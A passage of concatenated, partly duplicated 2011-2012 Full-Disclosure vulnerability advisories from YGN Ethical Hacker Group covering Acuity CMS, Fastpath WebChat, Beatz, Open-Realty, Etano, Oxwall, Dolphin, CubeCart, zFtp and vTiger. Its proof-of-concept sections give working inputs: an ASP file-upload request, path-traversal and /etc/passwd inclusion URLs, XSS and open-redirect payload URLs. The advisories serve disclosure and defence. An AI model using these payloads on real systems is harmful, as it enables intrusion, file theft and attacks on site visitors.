Acuity CMS 2.6.x (ASP-based) version contain a flaw that may allow an
attacker to upload .asp/.aspx files without restrictions, which will
execute ASP(.Net) codes. The issue is due to the script,
/admin/file_manager/file_upload_submit.asp , not properly sanitizing
'file1', 'file2', 'file3', 'fileX' parameters.


4. VERSIONS AFFECTED

Tested with version 2.6.2.


5. PROOF-OF-CONCEPT/EXPLOIT

[REQUEST]
POST /admin/file_manager/file_upload_submit.asp HTTP/1.1
Host: localhost
Cookie: ASPSESSIONID=XXX

-6dc3a236402e2
Content-Disposition: form-data; name=path

/images
-6dc3a236402e2
Content-Disposition: form-data; name=rootpath

/
-6dc3a236402e2
Content-Disposition: form-data; name=rootdisplay

http://localhost/
-6dc3a236402e2
Content-Disposition: form-data; name=status

confirmed
-6dc3a236402e2
Content-Disposition: form-data; name=action

fileUpload
-6dc3a236402e2
Content-Disposition: form-data; name=file1; filename=0wned.asp
Content-Type: application/octet-stream

% response.write(0wned!) %

-6dc3a236402e2--

[/REQUEST]


6. SOLUTION

The Acunity CMS is no longer in active development.
It is recommended to user another CMS in active development and support.


7. VENDOR

The Collective
http://www.thecollective.com.au/


8. CREDIT

Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar.


9. DISCLOSURE TIME-LINE

2012-05-20: vulnerability disclosed


10. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/%5Bacuity_cms2.6%20x_(asp)%5D_arbitrary_fileupload

#yehg [2012-05-20]

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] Acuity CMS 2.6.x = Path Traversal Arbitrary File Access

2012-05-20 Thread YGN Ethical Hacker Group
1. OVERVIEW

Acuity CMS 2.6.x (ASP-based) versions are vulnerable to Path Traversal.


2. BACKGROUND

Acuity CMS is a powerful but simple, extremely easy to use, low
priced, easy to deploy content management system. It is a leader in
its price and feature class.


3. VULNERABILITY DESCRIPTION

The issue is due to the script, /admin/file_manager/browse.asp, not
properly sanitizing user input, specifically directory traversal style
attacks (e.g., ../../) supplied via the 'path' parameter. It would
allow the attacker to access arbitrary files outside of web root
directory.


4. VERSIONS AFFECTED

Tested with version 2.6.2.


5. PROOF-OF-CONCEPT/EXPLOIT

http://localhost/admin/file_manager/browse.asp?field=form=path=../../


6. SOLUTION

The Acunity CMS is no longer in active development.
It is recommended to user another CMS in active development and support.


7. VENDOR

The Collective
http://www.thecollective.com.au/


8. CREDIT

Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar.


9. DISCLOSURE TIME-LINE

2012-05-20: vulnerability disclosed


10. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/%5Bacuity_cms2.6%20x_(asp)%5D_path_traversal

#yehg [2012-05-20]

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] Acuity CMS 2.6.x = Path Traversal Arbitrary File Access

2012-05-20 Thread YGN Ethical Hacker Group
1. OVERVIEW

Acuity CMS 2.6.x (ASP-based) versions are vulnerable to Path Traversal.


2. BACKGROUND

Acuity CMS is a powerful but simple, extremely easy to use, low
priced, easy to deploy content management system. It is a leader in
its price and feature class.


3. VULNERABILITY DESCRIPTION

The issue is due to the script, /admin/file_manager/browse.asp, not
properly sanitizing user input, specifically directory traversal style
attacks (e.g., ../../) supplied via the 'path' parameter. It would
allow the attacker to access arbitrary files outside of web root
directory.


4. VERSIONS AFFECTED

Tested with version 2.6.2.


5. PROOF-OF-CONCEPT/EXPLOIT

http://localhost/admin/file_manager/browse.asp?field=form=path=../../


6. SOLUTION

The Acunity CMS is no longer in active development.
It is recommended to user another CMS in active development and support.


7. VENDOR

The Collective
http://www.thecollective.com.au/


8. CREDIT

Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar.


9. DISCLOSURE TIME-LINE

2012-05-20: vulnerability disclosed


10. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/%5Bacuity_cms2.6%20x_(asp)%5D_path_traversal

#yehg [2012-05-20]

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] Acuity CMS 2.6.x = Arbitrary File Upload

2012-05-20 Thread YGN Ethical Hacker Group
1. OVERVIEW

Acuity CMS 2.6.x (ASP-based) versions are vulnerable to Arbitrary File Upload.


2. BACKGROUND

Acuity CMS is a powerful but simple, extremely easy to use, low
priced, easy to deploy content management system. It is a leader in
its price and feature class.


3. VULNERABILITY DESCRIPTION

Acuity CMS 2.6.x (ASP-based) version contain a flaw that may allow an
attacker to upload .asp/.aspx files without restrictions, which will
execute ASP(.Net) codes. The issue is due to the script,
/admin/file_manager/file_upload_submit.asp , not properly sanitizing
'file1', 'file2', 'file3', 'fileX' parameters.


4. VERSIONS AFFECTED

Tested with version 2.6.2.


5. PROOF-OF-CONCEPT/EXPLOIT

[REQUEST]
POST /admin/file_manager/file_upload_submit.asp HTTP/1.1
Host: localhost
Cookie: ASPSESSIONID=XXX

-6dc3a236402e2
Content-Disposition: form-data; name=path

/images
-6dc3a236402e2
Content-Disposition: form-data; name=rootpath

/
-6dc3a236402e2
Content-Disposition: form-data; name=rootdisplay

http://localhost/
-6dc3a236402e2
Content-Disposition: form-data; name=status

confirmed
-6dc3a236402e2
Content-Disposition: form-data; name=action

fileUpload
-6dc3a236402e2
Content-Disposition: form-data; name=file1; filename=0wned.asp
Content-Type: application/octet-stream

% response.write(0wned!) %

-6dc3a236402e2--

[/REQUEST]


6. SOLUTION

The Acunity CMS is no longer in active development.
It is recommended to user another CMS in active development and support.


7. VENDOR

The Collective
http://www.thecollective.com.au/


8. CREDIT

Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar.


9. DISCLOSURE TIME-LINE

2012-05-20: vulnerability disclosed


10. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/%5Bacuity_cms2.6%20x_(asp)%5D_arbitrary_fileupload

#yehg [2012-05-20]

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] FastPath Webchat | Multiple Cross Site Scripting Vulnerabilities

2012-04-16 Thread YGN Ethical Hacker Group
1. OVERVIEW

Fastpath WebChat is vulnerable to Cross Site Scripting.


2. BACKGROUND

Fastpath WebChat is part of the Fastpath product. It provides a way
for users to begin chatting with support agents using Fastpath.
Fastpath is a plugin of OpenFire, a real time collaboration (RTC)
server for instant messaging.  Fastpath provides queuing and routing
for instant messaging to intelligently link people together.


3. VULNERABILITY DESCRIPTION

Multiple parameters were not properly sanitized, which allows attacker
to conduct Cross Site Scripting attack. This may allow an attacker to
create a specially crafted URL that would execute arbitrary script
code in a victim's browser.


4. VERSIONS AFFECTED

4.0.0 (released date: Aug 5, 2008)


5. VULNERABLE PARAMETERS

File: webapp/agentinfo.jsp  
Parameters: agentName, emailValue, jid, nameValue, title

File: webapp/chat-ended.jsp 
Parameter: workgroup

File: webapp/chatmain.jsp   
Parameters: chatID, workgroup

File: webapp/chatroom.jsp   
Parameters: email, jid, userNickname, question

File: webapp/contact-agent.jsp  
Parameter: email

File: webapp/email/leave-a-message.jsp  
Parameter: workgroup

File: webapp/email/offline-mail.jsp 
Parameter: workgroup

File: webapp/queue_updater.jsp  
Parameters: chatID, workgroup   

File: webapp/style.jsp
Parameter:   workgroup  

File: webapp/transcriptmain.jsp 
Parameters: chatID, workgroup

File: webapp/transcriptsrc.jsp
Parameters:  from, text


6. SOLUTION

Fastpath WebChat is no longer in active development.
Ref: http://www.igniterealtime.org/projects/openfire/plugins.jsp
Ref: 
http://fisheye.igniterealtime.org/browse/svn-org/openfire/trunk/src/plugins/fastpath/src/web


7. VENDOR

Jive Software
http://www.jivesoftware.com/


8. CREDIT

This vulnerability was discovered by Aung Khant, http://yehg.net, YGN
Ethical Hacker Group, Myanmar.


9. DISCLOSURE TIME-LINE

2012-04-15: vulnerability disclosed


10. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/%5Bfastpath-webchat%5D_multiple_cross_site_scripting
What XSS Can Do: http://yehg.net/lab/pr0js/view.php/What%20XSS%20Can%20Do.pdf
XSS FAQs: http://www.cgisecurity.com/articles/xss-faq.shtml
XSS (wiki): http://en.wikipedia.org/wiki/Cross-site_scripting
XSS (owasp): http://www.owasp.org/index.php/Cross-site_Scripting_(XSS)
OWASP Top 10: http://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project
CWE-79: http://cwe.mitre.org/data/definitions/79.html


#yehg [2012-04-15]

-
Best regards,
YGN Ethical Hacker Group
Yangon, Myanmar
http://yehg.net
Our Lab | http://yehg.net/lab
Our Directory | http://yehg.net/hwd

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] Joomla! Plugin - Beatz 1.x = Multiple Cross Site Scripting Vulnerabilities

2012-04-16 Thread YGN Ethical Hacker Group
1. OVERVIEW

Beatz 1.x versions are vulnerable to Cross Site Scripting.


2. BACKGROUND

Beatz is a set of powerful Social Networking Script Joomla! 1.5
plugins that allows you to start your own favourite artist band
website. Although it is just a Joomla! plugin, it comes with full
Joolma! bundle for ease of use and installation.


3. VULNERABILITY DESCRIPTION

Multiple parameters were not properly sanitized upon submission, which
allows attacker to conduct Cross Site Scripting attack. This may allow
an attacker to create a specially crafted URL that would execute
arbitrary script code in a victim's browser. The vulnerable plugins
include: com_find, com_charts and com_videos.


4. VERSIONS AFFECTED

Tested in 1.x versions


5. PROOF-OF-CONCEPT/EXPLOIT

== Generic Joomla! 1.5 Double Encoding XSS

http://localhost/beatz/?option=com_contentview=frontpagelimitstart=5%2522%253e%253c%2573%2563%2572%2569%2570%2574%253e%2561%256c%2565%2572%2574%2528%2f%2558%2553%2553%2f%2529%253c%2f%2573%2563%2572%2569%2570%2574%253e=1

== com_charts (parameter: do)

http://localhost/beatz/index.php?option=com_chartsview=chartsItemid=76chartkeyword=Acousticdo=all%22%20style%3dbackground-image:url('javascript:alert(/XSS/)');width:1000px;height:1000px;display:block;%20x=%22option=com_charts

== com_find (parameter: keyword)

http://localhost/beatz/index.php?do=listAllkeyword=++Search;img+src=0+onerror=prompt(/XSS/)option=com_find

== com_videos (parameter: video_keyword)

http://localhost/beatz/index.php?option=com_videosview=videosItemid=59video_keyword=+style=width:1000px;height:1000px;position:absolute;left:0;top:0+onmouseover=alert(/xss/)search=Search


6. SOLUTION

The vendor hasn't released the fixed yet.


7. VENDOR

Cogzidel Technologies Pvt Ltd.
http://www.cogzidel.com/


8. CREDIT

Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar.


9. DISCLOSURE TIME-LINE

2011-03-01: notified vendor
2012-04-15: vulnerability disclosed


10. REFERENCES

Original Advisory URL: http://yehg.net/lab/pr0js/advisories/%5Bbeatz_1.x%5D_xss

#yehg [2012-04-15]

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] Open-Realty CMS 2.5.8 (2.x.x) = select_users_template Local File Inclusion Vulnerability

2012-03-05 Thread YGN Ethical Hacker Group
1. OVERVIEW

Open-Realty 2.5.8 and lower versions are vulnerable to Local File Inclusion.


2. BACKGROUND

Open-Realty is the world's leading real estate listing marketing and
management CMS application, and has enjoyed being the real estate web
site software of choice for professional web site developers since
2002.


3. VULNERABILITY DESCRIPTION

Open-Realty contains a flaw that may allow a remote attacker to
execute arbitrary commands or code. The issue is due to the
'index.php' script not properly sanitizing user input, specifically
directory traversal style attacks (e.g., ../../) supplied to the
'select_users_template' parameter. This may allow an attacker to
include a file from the targeted host that contains arbitrary commands
or code that will be executed by the vulnerable script. Such attacks
are limited due to the script only calling files already on the target
host. In addition, this flaw can potentially be used to disclose the
contents of any file on the system accessible by the web server.


4. VERSIONS AFFECTED

2.5.8 (2.x.x) =


5. PROOF-OF-CONCEPT/EXPLOIT

http://localhost/open-realty2.5.8/?select_users_template=../../../../../../../../../../../../../../../etc/passwd%00


6. SOLUTION

The version 2.5.x version family is no longer maintained by the vendor.
The version 3.x.x is not found to be vulnerable to this issue. Upgrade
to the latest 3.x.x version.


7. VENDOR

Transparent Technologies Inc.
http://www.transparent-support.com


8. CREDIT

Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar.


9. DISCLOSURE TIME-LINE

2012-03-05: Open-Realty 2.5.8 in End-of-Support/Maintenance circle
2012-03-05: Vulnerability disclosed


10. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/%5Bopen-realty_2.5.8_2.x%5D_lfi
Open-Realty Home Page: http://www.open-realty.org/
CWE-98: Improper Control of Filename for Include/Require Statement in
PHP Program ('PHP File Inclusion')
CAPEC-252: PHP Local File Inclusion


#yehg [2012-03-05]

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] Etano 1.x = Multiple Cross Site Scripting Vulnerabilities

2012-03-05 Thread YGN Ethical Hacker Group
1. OVERVIEW

Etano 1.x versions are vulnerable to Cross Site Scripting.


2. BACKGROUND

The community builder script we provide - Etano - was built entirely
based on requests from customers of our previous dating package
(Dating Site Builder). Almost every feature ever requested was built
into Etano to help you build a better site for your community members.
You can use Etano to start up a dating site, a social networking site,
a classifieds site or any other type of site involving groups of
people, companies, products.


3. VULNERABILITY DESCRIPTION

Multiple parameters were not properly sanitized upon submission to
join.php, search.php, photo_search.php and photo_view.php , which
allows attacker to conduct Cross Site Scripting attack. This may allow
an attacker to create a specially crafted URL that would execute
arbitrary script code in a victim's browser.


4. VERSIONS AFFECTED

Tested in 1.x versions (1.20-1.22)


5. PROOF-OF-CONCEPT/EXPLOIT

URL: http://localhost/etano/join.php
Method: POST
Vulnerable Parameters: user, email, email2, f17_zip, agree



URL: http://localhost/etano/search.php
Method: GET
Vulnerable Parameters: QUERY STRING, st, f17_city,f17_country ,
f17_state, f17_zip, f19, wphoto, search, v, return


http://localhost/etano/search.php?'scriptalert(/XSS/)/script

http://localhost/etano/search.php?st='scriptalert(/XSS/)/script

http://localhost/etano/search.php?f17_city='scriptalert(/XSS/)/scriptf17_country=0f17_state=0f17_zip=3f19=0st=basicwphoto=1

http://localhost/etano/search.php?f17_city=0f17_country='scriptalert(/XSS/)/scriptf17_state=0f17_zip=3f19=0st=basicwphoto=1

http://localhost/etano/search.php?f17_city=0f17_country=0f17_state='scriptalert(/XSS/)/scriptf17_zip=3f19=0st=basicwphoto=1

http://localhost/etano/search.php?f17_city=0f17_country=0f17_state=0f17_zip='scriptalert(/XSS/)/scriptf19=0st=basicwphoto=1

http://localhost/etano/search.php?f17_city=0f17_country=0f17_state=0f17_zip=3f19='scriptalert(/XSS/)/scriptst=basicwphoto=1

http://localhost/etano/search.php?f17_city=0f17_country=0f17_state=0f17_zip=3f19=0st='scriptalert(/XSS/)/scriptwphoto=1

http://localhost/etano/search.php?f17_city=0f17_country=0f17_state=0f17_zip=3f19=0st=basicwphoto='scriptalert(/XSS/)/script

http://localhost/etano/search.php?search='scriptalert(/XSS/)/scriptv=g

http://localhost/etano/search.php?search=51d43831f5dde83a4eedb23895f165f6v='scriptalert(/XSS/)/script

http://localhost/etano/search.php?st=xss;scriptalert(/XSS/)/scriptuser=unknown



URL: http://localhost/etano/photo_search.php
Method: GET
Vulnerable Parameters: QUERY STRING, st, return

http://localhost/etano/photo_search.php?'scriptalert(/XSS/)/script

http://localhost/etano/photo_search.php?st='scriptalert(/XSS/)/script



URL: http://localhost/etano/photo_view.php
Method: GET
Vulnerable Parameter: return

http://localhost/etano/photo_view.php?photo_id=1return=;scriptalert(/XSS/)/script


6. SOLUTION

The vendor hasn't released the fixed yet.


7. VENDOR

Datemill
http://www.datemill.com/


8. CREDIT

Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar.


9. DISCLOSURE TIME-LINE

2011-06-21: notified vendor
2012-03-05: vulnerability disclosed


10. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/%5Betano_1.2.x%5D_xss


#yehg [2012-03-05]

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] OxWall 1.1.1 = Multiple Cross Site Scripting Vulnerabilities

2012-02-21 Thread YGN Ethical Hacker Group
1. OVERVIEW

OxWall 1.1.1 and lower versions are vulnerable to Cross Site Scripting.


2. BACKGROUND

Oxwall is a free open source software package for building social
networks, family sites and collaboration systems. It is a flexible
community website engine developed with the aim to provide people with
a well-coded, user-friendly software platform for social needs. It is
easy to set up, configure and manage Oxwall while you focus on your
site idea. We are testing the concept of free open source community
software for complete (site,sub-site setups) and partial
(widgets,features) community and collaboration solutions for companies
and individuals.


3. VULNERABILITY DESCRIPTION

Multiple parameters were not properly sanitized, which allows attacker
to conduct Cross Site Scripting attack. This may allow an attacker to
create a specially crafted URL that would execute arbitrary script
code in a victim's browser.


4. VERSIONS AFFECTED

1.1.1 and lower


5. PROOF-OF-CONCEPT/EXPLOIT

URL: http://localhost/Oxwall/join

Injected Attack String: 'scriptalert(/XSS/)/script
Method: HTTP POST
Vulnerable Parameters: captchaField, email, form_name  ,password
,realname  ,repeatPassword ,username



URL: http://localhost/Oxwall/contact

Injected Attack String: 'scriptalert(/XSS/)/script
Method: HTTP POST
Vulnerable Parameters: captcha, email, form_name  ,from , subject


URL: 
http://localhost/Oxwall/blogs/browse-by-tag?tag=%27%22%3E%3Cscript%3Ealert%28/XSS/%29%3C/script%3E
Vulnerable Parameter: tag



Vulnerable Parameter: RAW-URI

http://localhost/Oxwall/photo/viewlist/tagged/img src=xs onerror=alert('XSS')

http://localhost/Oxwall/photo/viewlist/%22style%3d%22position:fixed;width:1000px;height:1000px;display:block;left:0;top:0%22onmouseover=alert%28%27XSS%27%29;%22x=

http://localhost/Oxwall/video/viewlist/%22style%3d%22position:fixed;width:1000px;height:1000px;display:block;left:0;top:0%22onmouseover=alert%28%27XSS%27%29;%22x=


6. SOLUTION

Upgade to the latest version of Oxwall.


7. VENDOR

Oxwall Foundation
http://www.oxwall.org/


8. CREDIT

Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar.


9. DISCLOSURE TIME-LINE

2011-06-09: notified vendor
2012-02-20: vulnerability disclosed


10. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/%5BOxWall_1.1.1%5D_xss
Oxwall Home Page: http://www.oxwall.org/


#yehg [2012-02-20]

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] Dolphin 7.0.7 = Multiple Cross Site Scripting Vulnerabilities

2012-02-21 Thread YGN Ethical Hacker Group
1. OVERVIEW

Dolphin 7.0.7 and lower versions are vulnerable to Cross Site Scripting.


2. BACKGROUND

Dolphin is the only all-in-one free community software platform for
creating your own social networking, community or online dating site
without any limits and under your full control. Dolphin comes with
hundreds of features, module plugins and tools. Everything is included
and extension posibilities are literally endless. You can use it for
free with a BoonEx link in the footer or buy a $99 permanent license
to remove that requirement.


3. VULNERABILITY DESCRIPTION

Multiple parameters (explain,photos_only,online_only,mode) were not
properly sanitized, which allows attacker to conduct Cross Site
Scripting attack. This may allow an attacker to create a specially
crafted URL that would execute arbitrary script code in a victim's
browser.


4. VERSIONS AFFECTED

7.0.7 and lower


5. PROOF-OF-CONCEPT/EXPLOIT

Vulnerable Parameter: explain

http://localhost/dolph/explanation.php?explain=%27%22%3E%3Cscript%3Ealert%28/xss/%29%3C/script%3E


Vulnerable Parameters: photos_only,online_only,mode

http://localhost/dolph/viewFriends.php?iUser=1page=1per_page=32sort=activityphotos_only='scriptalert(/xss/)/script

http://localhost/dolph/viewFriends.php?iUser=1page=1per_page=32sort=activityonline_only='scriptalert(/xss/)/script

http://localhost/dolph/viewFriends.php?iUser=1page=1sort=activitymode='scriptalert(/xss/)/script


6. SOLUTION

Upgade to the latest version of Dolphine.


7. VENDOR

BoonEx Pty Ltd
http://www.boonex.com/


8. CREDIT

Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar.


9. DISCLOSURE TIME-LINE

2011-06-09: notified vendor
2011-10-24: fixed version, 7.0.8, released
2012-02-20: vulnerability disclosed


10. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/%5BDolphin_7.0.7%5D_xss
BoonEx Home Page: http://www.boonex.com/


#yehg [2012-02-20]

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] CubeCart 3.0.20 (3.0.x) and lower | Open URL Redirection Vulnerability [Updated]

2012-02-19 Thread YGN Ethical Hacker Group
1. OVERVIEW

The CubeCart 3.0.20 and lower versions are vulnerable to Open URL Redirection.


2. BACKGROUND

CubeCart is an out of the box ecommerce shopping cart software
solution which has been written to run on servers that have PHP 
MySQL support. With CubeCart you can quickly setup a powerful online
store which can be used to sell digital or tangible products to new
and existing customers all over the world.


3. VULNERABILITY DESCRIPTION

The CubeCart 3.0.20 and lower versions contain a flaw that allows a
remote cross site redirection attack. This flaw exists because the
application does not properly sanitise the parameters,goto, r and
redir.  This allows an attacker to create a specially crafted URL,
that if clicked, would redirect a victim from the intended legitimate
web site to an arbitrary web site of the attacker's choice.


4. VERSIONS AFFECTED

3.0.20 and lower (aka 3.0.x family)


5. PROOF-OF-CONCEPT/EXPLOIT

http://localhost/cube3.0.20/switch.php?r=//yehg.net/lang=es
http://localhost/cube3.0.20/admin/login.php?goto=//yehg.net
http://localhost/cube/index.php?act=loginredir=Ly95ZWhnLm5ldC8%3D
http://localhost/cube/cart.php?act=regredir=L2N1YmUvaW5kZXgucGhwP2FjdD1sb2dpbg%3D%3D


6. SOLUTION

The CubeCart 3.0.x version family is no longer maintained by the vendor.


7. VENDOR

CubeCart Development Team
http://cubecart.com/


8. CREDIT

Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar.


9. DISCLOSURE TIME-LINE

2012-02-10: CubeCart 3.0.x in End-of-Support/Maintenance circle
2012-02-10: Vulnerability disclosed
2012-02-19: Vulnerability updated


10. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/[cubecart_3.0.20_3.0.x]_open_url_redirection
CubeCart Home Page: http://cubecart.com/
OWASP Top 10 2010 - A 10:
http://www.owasp.org/index.php/Top_10_2010-A10-Unvalidated_Redirects_and_Forwards
SANS Top 25: http://cwe.mitre.org/top25/#CWE-601
CWE-601: http://cwe.mitre.org/data/definitions/601.html


11. CHANGE LOG

This advisory was updated on 2012-02-19 with one additional vulnerable
parameter, redir.


#yehg [2012-02-10]
last updated: 2012-02-19

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] CubeCart 3.0.20 (3.0.x) and lower | Open URL Redirection Vulnerability

2012-02-10 Thread YGN Ethical Hacker Group
1. OVERVIEW

The CubeCart 3.0.20 and lower versions are vulnerable to Open URL Redirection.


2. BACKGROUND

CubeCart is an out of the box ecommerce shopping cart software
solution which has been written to run on servers that have PHP 
MySQL support. With CubeCart you can quickly setup a powerful online
store which can be used to sell digital or tangible products to new
and existing customers all over the world.


3. VULNERABILITY DESCRIPTION

The CubeCart 3.0.20 and lower versions contain a flaw that allows a
remote cross site redirection attack. This flaw exists because the
application does not properly sanitise the parameters,goto and r.
This allows an attacker to create a specially crafted URL, that if
clicked, would redirect a victim from the intended legitimate web site
(domain.com) to an arbitrary web site (localhost) of the attacker's
choice.


4. VERSIONS AFFECTED

3.0.20 and lower (aka 3.0.x family)


5. PROOF-OF-CONCEPT/EXPLOIT

http://localhost/cube3.0.20/switch.php?r=//yehg.net/lang=es
http://localhost/cube3.0.20/admin/login.php?goto=//yehg.net


6. SOLUTION

The CubeCart 3.0.x version family is no longer maintained by the vendor.
Upgrade to CubeCart 4x/5.x.


7. VENDOR

CubeCart Development Team
http://cubecart.com/


8. CREDIT

Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar.


9. DISCLOSURE TIME-LINE

2012-02-10: CubeCart 3.0.x in End-of-Support/Maintenance circle
2012-02-10: Vulnerability disclosed


10. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/[cubecart_3.0.20_3.0.x]_open_url_redirection
CubeCart Home Page: http://cubecart.com/
OWASP Top 10 2010 - A 10:
http://www.owasp.org/index.php/Top_10_2010-A10-Unvalidated_Redirects_and_Forwards
SANS Top 25: http://cwe.mitre.org/top25/#CWE-601
CWE-601: http://cwe.mitre.org/data/definitions/601.html

#yehg [2012-02-10]

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] zFtp Server = 2011-04-13 | STAT, CWD Remote Denial of Service Vulnerability

2011-10-25 Thread YGN Ethical Hacker Group
zFtp Server = 2011-04-13 | STAT,CWD Remote Denial of Service Vulnerability


1. OVERVIEW

The zFTP server is found to be vulnerable to denial of service in
handling multiple STAT and CWD command requests.


2. BACKGROUND

The zFTP server is a Windows based FTP server with focus on clever
Active Directory integration and powerful, effortless administration.


3. VERSIONS AFFECTED

2011-04-13 and earlier


4. PROOF-OF-CONCEPT/EXPLOIT

http://www.exploit-db.com/exploits/18028/


5. SOLUTION

The vendor has released the patched version
(http://download.zftpserver.com/zFTPServer_Suite_Setup.exe)


6. VENDOR

Vastgota-Data


7. CREDIT

This vulnerability was discovered by Myo Soe, http://yehg.net, YGN
Ethical Hacker Group, Myanmar.


8. DISCLOSURE TIME-LINE

2011-06-19: notified vendor through email
2011-10-17: vendor released fixed version, 2011-10-17
2011-10-25: vulnerability disclosed


9. REFERENCES

Original Advisory URL:
http://core.yehg.net/lab/pr0js/advisories/%5Bzftpserver_2011-04-13%5D_stat,cwd_dos
zFTP Server Home Page: http://zftpserver.com


#yehg [2011-10-25]

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] vTiger CRM 5.2.x = Remote Code Execution Vulnerability

2011-10-05 Thread YGN Ethical Hacker Group
vTiger CRM 5.2.x = Remote Code Execution Vulnerability


1. OVERVIEW

The vTiger CRM 5.2.1 and lower versions are vulnerable to Remote Code
Execution. No fixed version has been released as of 2011-10-05.


2. BACKGROUND

vtiger CRM is a free, full-featured, 100% Open Source CRM software
ideal for small and medium businesses, with low-cost product support
available to production users that need reliable support. vtiger CRM
is a widely used product with thousands of users in dozens of
countries.  It has a vibrant community of users driving the product
forward, and contributing to it's development.  Over 2 million copies
of vtiger CRM have been downloaded so far. It was launched as a fork
of version 1.0 of the SugarCRM project launched on December 31st,
2004.


3. VULNERABILITY DESCRIPTION

vTiger uses the vulnerable version of phpmailer class file located at
/cron/class.phpmailer.php .


4. VERSIONS AFFECTED

Tested on 5.2.1


5. PROOF-OF-CONCEPT/EXPLOIT

File: /cron/class.phpmailer.php
[code]

391:function SendmailSend($header, $body) {
392:if ($this-Sender != )
393:   $sendmail = sprintf(%s -oi -f %s -t, $this-Sendmail,
$this-Sender);
394:else
395:   $sendmail = sprintf(%s -oi -t, $this-Sendmail);

[/code]


6. SOLUTION

The vendor hasn't attempted to incorporate the latest version of
phpMailer class in their vTigerCRM as of version 5.2.1.

The flawed code portion can be patched with:

393: $sendmail = sprintf(%s -oi -f %s -t,
escapeshellcmd($this-Sendmail), escapeshellarg($this-Sender));
395: $sendmail = sprintf(%s -oi -t, escapeshellcmd($this-Sendmail));


7. VENDOR

vTiger Development Team
http://www.vtiger.com/


8. CREDIT

This vulnerability was discovered by Aung Khant, http://yehg.net, YGN
Ethical Hacker Group, Myanmar.


9. DISCLOSURE TIME-LINE

2010-12-08: notified vendor
2011-10-05: no fixed version released yet
2011-10-05: vulnerability disclosed


10. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/%5BvTiger_5.2.1%5D_rce
Wiki VtigerCRM: https://secure.wikimedia.org/wikipedia/en/wiki/Vtiger_CRM
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3215

#yehg [2011-10-05]

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] vTiger CRM 5.2.x = Blind SQL Injection Vulnerability

2011-10-05 Thread YGN Ethical Hacker Group
vTiger CRM 5.2.x = Blind SQL Injection Vulnerability



1. OVERVIEW

The vTiger CRM 5.2.1 and lower versions are vulnerable to Blind SQL
Injection. No fixed version has been released as of 2011-10-05.


2. BACKGROUND

vtiger CRM is a free, full-featured, 100% Open Source CRM software
ideal for small and medium businesses, with low-cost product support
available to production users that need reliable support. vtiger CRM
is a widely used product with thousands of users in dozens of
countries.  It has a vibrant community of users driving the product
forward, and contributing to it's development.  Over 2 million copies
of vtiger CRM have been downloaded so far. It was launched as a fork
of version 1.0 of the SugarCRM project launched on December 31st,
2004.


3. VULNERABILITY DESCRIPTION

The onlyforuser parameter was not properly sanitized, which allows
attacker to conduct Blind SQL Injection Attack. This could an attacker
to inject or manipulate SQL queries in the back-end database, allowing
for the manipulation or disclosure of arbitrary data.


4. VERSIONS AFFECTED

Tested on 5.2.1


